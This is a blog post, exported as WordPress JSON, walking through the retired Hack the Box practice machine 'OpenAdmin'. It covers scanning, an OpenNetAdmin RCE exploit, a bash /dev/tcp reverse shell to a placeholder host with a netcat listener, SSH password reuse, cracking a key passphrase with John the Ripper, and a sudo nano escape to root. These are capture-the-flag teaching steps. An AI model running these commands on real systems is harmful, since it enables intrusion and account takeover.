{"id":910,"date":"2020-05-18T06:30:02","date_gmt":"2020-05-18T05:30:02","guid":{"rendered":"http:\/\/zerothcode.com\/blog\/?p=910"},"modified":"2020-05-18T06:30:02","modified_gmt":"2020-05-18T05:30:02","slug":"hack-box-open-admin-box-walkthrough","status":"publish","type":"post","link":"https:\/\/zerothcode.com\/blog\/hack-box-open-admin-box-walkthrough\/","title":{"rendered":"Hack the Box: Open Admin Box Walkthrough"},"content":{"rendered":"<p>Today, I am going to share a writeup for the boot2root challenge of the retired Hack the Box machine \u201cOPENADMIN\u201d.<\/p>\n<p>It is an easy Linux box. I owned it recently and learned many new things along the way.<\/p>\n<h3><strong>Table of Contents<\/strong><\/h3>\n<p><strong>Recon<\/strong><\/p>\n<ul>\n<li>Nmap<\/li>\n<li>Dirb<\/li>\n<li>Python script ona-rce.py<\/li>\n<\/ul>\n<p><strong>Exploit<\/strong><\/p>\n<ul>\n<li>Netcat<\/li>\n<li>sh<\/li>\n<li>SSH key brute force<\/li>\n<li>SSH login<\/li>\n<\/ul>\n<p><strong>Privilege Escalation<\/strong><\/p>\n<ul>\n<li>Abusing sudo<\/li>\n<li>Capture the flag<\/li>\n<\/ul>\n<h3><strong>Walkthrough<\/strong><\/h3>\n<h3><strong>Recon<\/strong><\/h3>\n<p>Recon is the act of gathering different kinds of information about the targeted system. We can use various tools, techniques, and websites for recon. 
Such as Nmap, Dirsearch, and Dirb; let\u2019s start with Nmap.<\/p>\n<p>We will start our recon with an Nmap scan to find the open ports and the service versions on our target.<\/p>\n<pre><code>nmap -sV -Pn 10.10.10.171<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-iGrHdj-i7GE\/Xrw8Q3LAc_I\/AAAAAAAAkAs\/VndDjFKH6FAUJf4XmnRzYg9iDBtfDihDQCLcBGAsYHQ\/s1600\/1.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>We will also fuzz for endpoints with the dirb tool using the command<\/p>\n<pre><code>dirb http:\/\/10.10.10.171\/<\/code><\/pre>\n<p>and we got some directories, such as artwork and music.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-IospIk-vKWI\/Xrw8TxSbwqI\/AAAAAAAAkBU\/U9bsIVJCtzkqRy6iq1weFZkfIjn21f4KgCLcBGAsYHQ\/s1600\/2.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>After checking all the directories, we found one web page with a login form.<\/p>\n<pre><code>http:\/\/10.10.10.171\/music<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-jOwiGg30APQ\/Xrw8WP4hCUI\/AAAAAAAAkBw\/jEygDrOP0JYicP63DajFnZm39qM6shMQwCLcBGAsYHQ\/s1600\/3.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>On the login page, we got the OpenNetAdmin version, so let\u2019s do some recon on \u201cona\u201d.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-PMb5ZKpul4Q\/Xrw8Wf39jlI\/AAAAAAAAkB0\/dn62W_d7Ync0C9HFna8W6yjLmh68tYQ3ACLcBGAsYHQ\/s1600\/4.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>After some recon, we found an <strong><a href=\"https:\/\/github.com\/amriunix\/ona-rce\">exploit<\/a><\/strong> for this application and this particular version.<\/p>\n<p>Let\u2019s download the exploit code and see how it works. The usage of this Python script is very simple: first we check whether the URL is vulnerable, and then we exploit it by running the same script in exploit mode.<\/p>\n<pre><code>python3 ona-rce.py check http:\/\/10.10.10.171\/ona\/<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-Azn0Zh9QOPA\/Xrw8Wntnc6I\/AAAAAAAAkB4\/dkHY0LhpnwcQGW8wlP7_cWyonALDI6NFACLcBGAsYHQ\/s1600\/6.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<h3><strong>Exploitation<\/strong><\/h3>\n<p>We already checked for this exploit during recon and confirmed that the URL is vulnerable to RCE. Using the command below, we exploit it, and yes, commands are executing successfully.<\/p>\n<pre><code>python3 ona-rce.py exploit http:\/\/10.10.10.171\/ona\/<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-hRgZkK2mphw\/Xrw8W6xqZ_I\/AAAAAAAAkB8\/I0R7tLEvyHw1VesMcJ_wA_4b0xX_SudhwCLcBGAsYHQ\/s1600\/7.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Yes, we are connected to the remote host and our current user is www-data. 
Now, with a netcat listener, we will get a reverse shell from the host for further enumeration of this Linux box. On the target, run:<\/p>\n<pre><code>\/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/&lt;IP&gt;\/&lt;PORT&gt; 0&gt;&amp;1'<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-FrRTnxfeq78\/Xrw8XE6tcOI\/AAAAAAAAkCA\/5Y-f0U3VT8EBSr5JghEVGFYZyq0WXY0ugCLcBGAsYHQ\/s1600\/8.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>And on our own machine, listen with:<\/p>\n<pre><code>nc -lvp 1234<\/code><\/pre>\n<p>Here the connection was established successfully.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-uA_RwBzJVrk\/Xrw8XYxI76I\/AAAAAAAAkCE\/We2EjRbYr24I5p5Q5B29oCpIx3BSgjKFwCLcBGAsYHQ\/s1600\/9.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Let\u2019s start enumerating this machine. First we enumerate the present working directory and see what juicy data is there. Here we got many directories; let\u2019s first check what\u2019s in the local directory.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-ZUsaymHPZTg\/Xrw8RH-cijI\/AAAAAAAAkAw\/53y19-ydfKYFQeIDCNswf911hvU16yHYACLcBGAsYHQ\/s1600\/10.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>After further enumeration in the same directory, we got one PHP file, \u201cdatabase_settings.inc.php\u201d.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-NeOOJSY_YX8\/Xrw8Qq2kQZI\/AAAAAAAAkAo\/YmG3222u4w8rnVYedl4UdcWAu4LWJ0TyQCLcBGAsYHQ\/s1600\/11.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Let\u2019s check what\u2019s in this PHP file.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-HOA7xOAU7r0\/Xrw8RcWsdlI\/AAAAAAAAkA0\/IbFzFiQn_g4cpdcyuQCq21m6LA-2zb0kQCLcBGAsYHQ\/s1600\/12.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>So here we got some credentials for the database.<\/p>\n<p>Now let\u2019s check how many users are present in the home directory of this machine. Here we got two users, \u201cjimmy\u201d and \u201cjoanna\u201d. 
<\/p>\n<p>From the port scan we did with Nmap during recon, we know that SSH port 22 is open.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-5gd2fBaABr8\/Xrw8R9KFyJI\/AAAAAAAAkA4\/ar3Tfzt_qfoWF-0R9LbM1xayrrfSHg1lQCLcBGAsYHQ\/s1600\/13.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Let\u2019s try to connect over SSH as the user jimmy with the password we found in the database_settings.inc.php file, in case it is reused.<\/p>\n<pre><code>ssh &lt;user&gt;@&lt;ip&gt;<\/code><\/pre>\n<p>And yes, we are in.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-2D8JJEbddig\/Xrw8SNztnII\/AAAAAAAAkA8\/8RGPtso6vY4clJJKBbqwHHFaIhImMozMwCLcBGAsYHQ\/s1600\/14.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Now we are connected as the jimmy user. For further enumeration we will first go to the \u201cvar\u201d directory; it\u2019s always good to enumerate the var directory. Doing so, we got one directory called \/var\/www\/internal.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-_bme4KesKbI\/Xrw8SReLn5I\/AAAAAAAAkBA\/FzY1WMp6St0jaT89-8M472mjrXzfb6HPQCLcBGAsYHQ\/s1600\/15.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>So here we got main.php in the \/var\/www\/internal directory. Now let\u2019s have a look at what\u2019s in main.php.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-tCRob-wLdiE\/Xrw8SmMOY7I\/AAAAAAAAkBE\/ksqE2hc6B0g_A8RYEBf8drv7Gkmc6mudwCLcBGAsYHQ\/s1600\/16.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>It is a PHP script that tells us we need to find the location of joanna\u2019s private SSH key.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-c5bV8IRWyRM\/Xrw8S4Dm9SI\/AAAAAAAAkBI\/jyD2FpmjkbMKJEFyl3jSnSaSbE93EsjfgCLcBGAsYHQ\/s1600\/17.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Now let\u2019s enumerate further to find where we can get joanna\u2019s SSH private key.<\/p>\n<p>Here we will use <strong><a href=\"https:\/\/github.com\/rebootuser\/LinEnum\/blob\/master\/LinEnum.sh\">LinEnum.sh<\/a><\/strong>. This bash script enumerates a Linux machine: which services are running, privilege and access information, version information, system information, user information, and so on.<\/p>\n<ol>\n<li>Download the script, or note the location where it is stored.<\/li>\n<li>Host it with a Python HTTP server and copy the link to the LinEnum.sh file.<\/li>\n<li>Download the script onto the remote host into the \u201c\/var\/tmp\u201d directory using the \u201cwget\u201d command.<\/li>\n<li>Make the LinEnum.sh shell script executable using the \u201cchmod\u201d command.<\/li>\n<li>Now run the script on the remote machine. 
<\/li>\n<\/ol>\n<pre><code>.\/LinEnum.sh<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-XOyUWd4JoVQ\/Xrw8TfVoiMI\/AAAAAAAAkBM\/QoAGi66vARgvTPevQ2rBx384bvB4gHKzQCLcBGAsYHQ\/s1600\/18.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>So here we got some information after running the shell script LinEnum.sh.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-f2rqQlw444s\/Xrw8TjHOt1I\/AAAAAAAAkBQ\/yE5Ndm8FMWssVC7enG9Q5YXCsp3cEzyUwCLcBGAsYHQ\/s1600\/19.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Here ports 52846 and 3306 are open and in the LISTEN state on localhost. Using curl, we will check on which of these local ports main.php is served. 
<\/p>\n<pre><code>curl http:\/\/127.0.0.1:52846\/main.php<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-09az-nwVWx8\/Xrw8UVDnQ_I\/AAAAAAAAkBY\/QMHv5aFvCE02TUrxJYYnp39ULsRB5SPzQCLcBGAsYHQ\/s1600\/20.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Here we successfully retrieved the SSH key from port 52846. Now save this key on your own system.<\/p>\n<p>We got joanna\u2019s SSH private key. Using it we will switch from the user jimmy to joanna. The key is passphrase-protected, so first we convert it into a hash with ssh2john.py, and then we crack that hash with John the Ripper. 
For more details see this <strong><a href=\"https:\/\/www.hackingarticles.in\/beginners-guide-for-john-the-ripper-part-2\/\">article<\/a><\/strong>.<\/p>\n<pre><code>python \/usr\/share\/john\/ssh2john.py id_rsa &gt;&gt; hash.txt\njohn --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash.txt<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-boOvMXDd9Kc\/Xrw8UnIPlzI\/AAAAAAAAkBc\/YHjMtwRBL-UwRhzt-CyiJGGP76kXWgVfACLcBGAsYHQ\/s1600\/21.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Successfully cracked!! The passphrase is \u201cbloodninjas\u201d.<\/p>\n<p>Let\u2019s switch to the other user account, joanna, using the private key and the passphrase \u201cbloodninjas\u201d.<\/p>\n<pre><code>ssh -i id_rsa joanna@10.10.10.171<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-7hzhNzjD_OU\/Xrw8U3un1AI\/AAAAAAAAkBg\/MG5LnQBRMH87M11H1DRR-GuD7MuEE6-DACLcBGAsYHQ\/s1600\/22.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Yayyy!! 
Here we got our user flag for this machine.<\/p>\n<h3><strong>Privilege Escalation<\/strong><\/h3>\n<p>Now moving towards the root flag, we need to check which commands this user may run as root without a password, using the command<\/p>\n<pre><code>sudo -l<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-xSwY6v4iiT4\/Xrw8VaYKCbI\/AAAAAAAAkBk\/DKXxm7Hpbmw08j5ygdDNst9R2HY3QgM8wCLcBGAsYHQ\/s1600\/23.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Here we got that we can run \/bin\/nano as root without a password.<\/p>\n<p>Let\u2019s do a quick Google search on nano privilege escalation. We can get a shell using the technique from <strong><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/nano\/\">GTFOBins<\/a><\/strong>: open the \/opt\/priv file with nano to escalate from the user to root.<\/p>\n<p>We can escape from nano to a root shell, so let\u2019s run the same command as given on the GTFOBins page.<\/p>\n<pre><code>reset; sh 1&gt;&amp;0 2&gt;&amp;0<\/code><\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-CJlx_DVrpWA\/Xrw8VV3_yDI\/AAAAAAAAkBo\/GG4gQRfog_E6mJf4hUKC4OKhu2kf6r6WQCLcBGAsYHQ\/s1600\/26.png?w=687&amp;ssl=1\" alt=\"\" width=\"457\" height=\"200\" data-recalc-dims=\"1\" \/><\/p>\n<p>Once we execute the command, our shell is escalated to root.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-HM4NTWzB0Gs\/Xrw8VhfAXlI\/AAAAAAAAkBs\/0mrDPdxfwJ4SEAfMFvzbC5Kxi0XU4TKAgCLcBGAsYHQ\/s1600\/27.png?w=687&amp;ssl=1\" alt=\"\" width=\"351\" height=\"128\" data-recalc-dims=\"1\" \/><\/p>\n<p>Here we got our root flag. That\u2019s all for now. See you next time. 
<\/p>\n<p>HAPPY HACKING!!<\/p>\n<p>More CTF: <a href=\"http:\/\/zerothcode.com\/blog\/node-1-ctf-walkthrough\/\">http:\/\/zerothcode.com\/blog\/node-1-ctf-walkthrough\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Today, I am going to share a writeup for the boot2root challenge of the Hack the Box machine<\/p>\n","protected":false},"author":1,"featured_media":911,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[487],"tags":[],"yst_prominent_words":[722,1372,1373,1367,1362,1359,689,481,1361,1279,1360,1370,1364,1368,1182,1365,1363,496,1366,1369],"class_list":["post-910","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts\/910","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/comments?post=910"}],"version-history":[{"count":0,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts\/910\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/media\/911"}],"wp:attachment":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/media?parent=910"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/categories?post=910"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/tags?post=910"},{"taxonomy":"yst_prominent_words","emb
eddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/yst_prominent_words?post=910"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}